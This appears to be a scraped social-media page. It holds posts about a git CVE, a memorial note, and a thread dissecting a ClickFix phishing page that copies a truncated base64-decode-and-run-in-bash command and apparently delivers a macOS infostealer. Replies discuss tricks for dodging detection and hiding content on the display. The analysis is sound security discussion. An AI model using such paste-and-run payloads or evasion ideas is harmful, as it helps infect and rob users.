| ๐ธ | https://dgl.cx |
| โฃ๏ธ | https://ไธ.st |
My first introduction to @dgl was finding https://dgl.cx/2023/09/ansi-terminal-security on my own and then being surprised he was a co-worker!
I got to sit down with him and chat about the recent git CVE he discovered and a lot more in our recent podcast episode.
If you don't have time for that, here's 5 minutes on the vulnerabililty specifically, cut from that interview: https://youtu.be/XZHxE3iWPMU
Supply chain security is a topic which has been raised in profile in recent years through events such as the xz backdoor. In the open source world trust matters a lot. While trust is mostly gained through social interactions, it is also important to trust the tools themselves. This talk will detail how I found several holes in common tools, leading to the potential for attacks against developer's tooling.
This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.
They even detect piping, so to read it you have to run "curl | cat".
Dammit, mst. I owe you. You welcomed me to the community, you inspired me, you made me laugh, and you nudged me in the right direction when I said some dumb shit. You didn't even permaban me when I flooded #perl with a kilobyte of combining Unicode characters. I still can't believe you're just ... gone. I wanted to talk to you again.
https://www.shadowcat.co.uk/2025/07/09/ripples-they-cause-in-the-world/
I found a vulnerability in git. CVE-2025-48384: Breaking git with a carriage return and cloning RCE - https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
As the post explains this is one of my favourite classes of vulnerability, using characters that are old and sometimes forgotten.
New blog post: restricting SFTP access with Linux user namespaces. Wherein I pass off a pretty awful shell script as a good idea.
This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.
They even detect piping, so to read it you have to run "curl | cat".
@filippo Interesting, I've only seen this for Windows users. Guess Linux is next.
But then again, `curl | bash` is probably what inspired this scam...
@filippo Have seen multiple of these by now.
But what is more interesting, how do you server-side detect that a script that is downloaded via curl is being or not?
Interesting, now I've to think what if they'd send you a different script when they detect this? Like one that is just designed to waste your time as a security researcher but does nothing. Combined with just sending a malicious script to a fraction of the victims would probably make it quite hard for researchers.
Or imagine you make this look like a legit service and 1/10th of the users running it get malwared ๐ค
@fooker @filippo
Even that isn't really secure, I've seen tricks with encoding that caused what you see on screen and what gets executed to be dramatically different in the past as well.
Like one of the more basic examples was to add a stray "\r" in the middle of a line as that would cause it to overwrite everything that was before that on screen. But when executed it would just skip over cause it was seen as part of a string.
Besides using a literal Hex editor is there any console based tool to look at a text file without it parsing control and escape codes? Like @don-ho.bsky.social's #Notepadpp but for the CLI?
@filippo hmm.
โset writemind to "/tmp/lovemrtrump/"โ
So cybercriminals really canโt help themselves but actually write to the victimโs disk in whose name theyโre conducting this heist?
๐ฅด
@filippo the copy/paste technique is called #ClickFix . the site in the image is infected by TA2726's Keitaro which is well known for sending Windows folks to #SocGholish . what they do with macOS folks has changed over the years. i see they sent you to something that delivered what looks like Poseidon Stealer.
https://medium.com/@MateoPappa/letsdefend-poseidon-macos-stealer-hard-a796c85d8c72
Investigate the Poseidon macOS infostealer to identify how it infiltrated the system and to extract the stolen data. Employ forensic and malware analysis techniques to uncover the full extent of theโฆ
JayF
Filippo Valsorda
Oriel Jutty 
Mitchell Hashimoto
Felix 
Eckhofer
ComputerNut43
SpaceLifeForm
Klaus Frank
fooker
b-loved dreamer
Britta
Adam
Toni Aittoniemi
Randy
Joshua Small
kechpaja